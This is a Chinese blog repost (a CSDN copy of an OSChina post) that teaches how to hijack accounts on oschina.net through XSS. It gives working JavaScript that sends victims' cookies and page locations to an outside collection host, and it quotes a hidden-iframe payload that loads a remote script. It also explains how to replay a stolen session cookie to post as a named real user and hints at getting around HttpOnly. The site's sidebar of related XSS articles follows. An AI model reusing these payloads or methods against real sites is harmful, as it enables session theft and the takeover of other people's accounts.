蟋蟀的xss淫荡教程之如何劫持OSC用户账号

最新推荐文章于 2023-02-21 09:25:12 发布
最新推荐文章于 2023-02-21 09:25:12 发布
阅读量4k 收藏 3
点赞数 1
分类专栏: XSS 文章标签: xss XSS

原文地址:http://my.oschina.net/samshuai/blog/82382?p=6#comments



其实xss大家搜搜下就知道怎么利用了。。但是劫持账户上。大家可能觉得有两个难点..我在这里教大家。。

1.如果收到被害者的cookie.

其实可以在自己网站上做一个脚本来进行cookie收集。。。也可以用第三方的cookie收集平台。。

比如xsser.me或者xss.la等。这两个平台都是禁止注册的。。自己写一个就好.很简单

熟悉javascript,简单看下别人偷cookie的代码。。就明白是怎么回事了

view source
print ?
01var x=new Image();
02try
03{
04var myopener='';
05myopener=window.opener && window.opener.location ? window.opener.location : '';
06}
07catch(err)
08{
09}
10x.src='http://xssapp.com/accept.aspx?id=@pid&location='+escape(document.location)+'&toplocation='+escape(top.document.location)+'&cookie='+escape(document.cookie)+'&opener='+escape(myopener);
11self.location="http://my.oschina.net/samshuai";

上面是我的xss javascript代码。。。

再发个别人的一个利用方式:

view source
print ?
1<iframe onload="this.src='xss 地址+<script src =tmxk.Org/0.js>'" style="display:none"></iframe>

2.获得cookie之后,如何使用?

其实firefox和chrome都有插件可以完成这个功能。直接替换上@铂金小猪 的oscid就可以用他的账号说话了。。

我用的是firefox的web developer toolbar:

@红薯 兼职就是聪明绝顶啊。。。这两天他捣鼓了一个Java EE 6.0 的 Cookie 类已经有设置 HttpOnly 的方法。。

其实使用httponly也是一种防止cookie被盗和被修改的方法。。主要让document.cookie不起作用。这真的能防止cookie被盗么???我笑了。。。。。大家可以说下继续利用的方式。。看看和我的绕过httponly方法是否一致。我的方法里面包裹document.xxx大家想想吧。。。

还有就是使用了httponly真的不能使用工具修改自己的cookie了么??也是有极其淫荡的方式的。。。大家也可以说说。

stilling2006
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS高级实战教程
09-28
跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style ...恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。
前端安全之XSS攻击
02-25
有人将XSS攻击分为三种,分别是:1.ReflectedXSS(基于反射的XSS攻击)2.StoredXSS(基于存储的XSS攻击)3.DOM-basedorlocalXSS(基于DOM或本地的XSS攻击)基于反射的XSS攻击,主要依靠站点服务端返回脚本,在客户端...
文件上传攻击骚操作
qq_50854662的博客
02-21 6307
文件上传攻击骚操作
web安全学习笔记(八) XSS之cookie劫持
qycc3391的博客
03-06 1501
上一文中提到XSS的分类,本文将演示如何通过XSS进行cookie劫持,并且伪装登录。 再cookie劫持中,有三种身份,分别是服务器,普通用户以及攻击者。这里使用本机和两台台虚拟机完成这项工作。基本思路如图所示: 首先,攻击者发现某个网站存在XSS漏洞,于是编写恶意代码。当用户访问带有恶意代码的网站时,会将通过恶意代码,将cookie发送给攻击者。当攻击者获取cookie后,便可以使用cook...
XSS盗取cookie
qq_43776408的博客
07-27 984
cookie介绍 反射XSS盗取cookie location是重定向一个新的URL 在这个新的URL中提交cookie参数 后面的document是属于之前ur 获取当前网站的cookiel cookie.php代码意思 通过get方式获取当前cookie 然后写到文件中 复制代码到网址栏后 或者复制到DVWA框中 返回网站根目录 出现cookie文件 利用cookie会话劫持 把画红圈中的内容修改为cookie.txt中的内容 这样的话就直接登陆了 就不用还要login.php 直接index.p
Web安全性测试之XSS
01-31
XSS 全称(CrossSiteScripting)跨站脚本攻击,是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的.比如获取用户的...
Web安全之XSS攻击与防御小结
02-23
恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。攻击者对含有漏洞的服务器发起XSS攻击(注入JS代码)。诱使受害者打开受到攻击...
Web安全测试之XSS实例讲解
09-01
本文主要介绍Web安全测试之XSS,这里详细整理了测试XSS的资料,并附示例代码和详细讲解,有需要的小伙伴可以参考下
XSS基础入门/从0到1/非常基础/cookie/会话劫持
ChenD的学习笔记
10-10 1410
cookie介绍、XSS类型、XSS盗取cookie、利用Cookie劫持会话
XSS (跨站脚本攻击) 分析与实战
未完成的歌~的博客
01-14 5100
文章目录一、漏洞原理1、XSS简介:2、XSS原理解析:3、XSS的分类:3.1、反射型XSS3.2、存储型XSS3.3、DOM型XSS二、靶场实战XSS实现盗取管理员Cookie并登录: 一、漏洞原理 1、XSS简介: XSS全称:Cross Site Scripting,即跨站脚本攻击,为了不和“层叠样式表”(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是最常见的 Web 应用程序安全漏洞之一,这类漏洞能够使攻击者嵌入恶意脚本代码(一般是JS代
dvwa中 利用反射型xss获取cookie进行会话的劫持演示
qq_35420342的博客
04-08 7492
首先打开dvwa,设置安全等级为low:输入&lt;script&gt;alert(11)&lt;/script&gt;证明弹窗:编写获取cookie的代码cookie.php,并将其放在一个web服务器上,这里我就放在http://127.0.0.1/dvwa/下面:构造如下URL,并发送给被攻击者:原始URL: http://location/dvwa/vulnerabilities/xss_...
前端安全之XSS,CSRF,网络劫持
cxz
05-06 423
XSS(跨站脚本攻击) 存储型 XSS 攻击者将恶意代码提交到目标网站的数据库中,这种攻击常见于带有用户保存数据的网站功能,如论坛发帖、商品评论、用户私信等 反射型 XSS 攻击者构造出特殊的 URL,其中包含恶意代码,这种攻击常见于通过 URL 传递参数的功能,如网站搜索、跳转等。由于需要用户主动打开恶意的 URL 才能生效,攻击者往往会结合多种手段诱导用户点击 DOM 型 XSS DOM 型 XSS 跟前两种 XSS 的区别:DOM 型 XSS 攻击中,取出和执行恶意代码由浏览器端完成,属于前
简单了解账号劫持产业
weixin_43116558的博客
04-05 163
电子邮件的重要性:各种网站账号都与邮件绑定 各种电子邮件攻击方法:密码重用、访问令牌获取、密码重置欺诈、网络钓鱼 防范电子邮件攻击方法:密码重置时的保护问题,浏览邮件以过滤钓鱼邮件,双因素认证机制 黑客攻击趋势:商品化 hack for hire:利用社会工程学开展服务。通过定制化的钓鱼邮件,搜刮个人社交网站收集目标信息。有些还使用恶意软件长期监视目标可重复使用的邮件模板,伪装成权威来源(谷歌、政...
JavaScript 骚操作
lentoo的博客
02-02 471
前言很多小伙伴们觉得JavaScript很简单,下面的这行JavaScript代码可能会让你怀疑人生。(!(~+[])+{})[--[~+""][+[]]*[~+[]] ...
一通骚操作,我把SQL执行效率提高了10000000倍!
weixin_33958366的博客
05-28 287
作者:风过无痕-唐场景我用的数据库是mysql5.6,下面简单的介绍下场景课程表:create table Course( c_id int PRIMARY KEY, name varchar(10) )复制代码数据100条学生表:create table Student( id int PRIMARY KEY, name varchar(10) )复制代码数据70000条学生成绩表S...
32个触发事件XSS语句的总结
weixin_33788244的博客
01-26 431
作者为monyer 1、onmouseenter:当鼠标进入选区执行代码 <div style="background-color:red" onmouseenter="alert('bem')">123456</div> 2、onmouseleave:当鼠标离开选区执行代码 <DIV style="BACKGROUND-COLO...
请一下这一段劫持代码 如何解决?
qq_40994086的博客
07-24 693
   最近在我的网站上发现了一段劫持代码 (DNS劫持吗?) 这一段代码下面还有好几条 但他隐藏掉了 刷新页面后3秒钟内会全部缩回去 变成上面那个样子 =   这个造成的效果是打开页面后 会随机出现这种链接 刷新后有时会出现 有时使劲刷新也不出现 点开链接就是一堆其他网页的广告 不出现这种链接的时候底部有这段代码 这是出现链接后的代码 原本我写进去的源代码到&lt;/scr...
dvwa靶场xss、通关教程
最新发布
08-29
关于DVWA靶场的XSS攻击和通关教程,有一些方法可以使用。其中一种方式是通过组合命令来实现。在批处理脚本中,可以使用"&"符号将多个命令组合在一起执行。这样可以顺序执行多个命令,当第一个命令执行失败时,后面的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值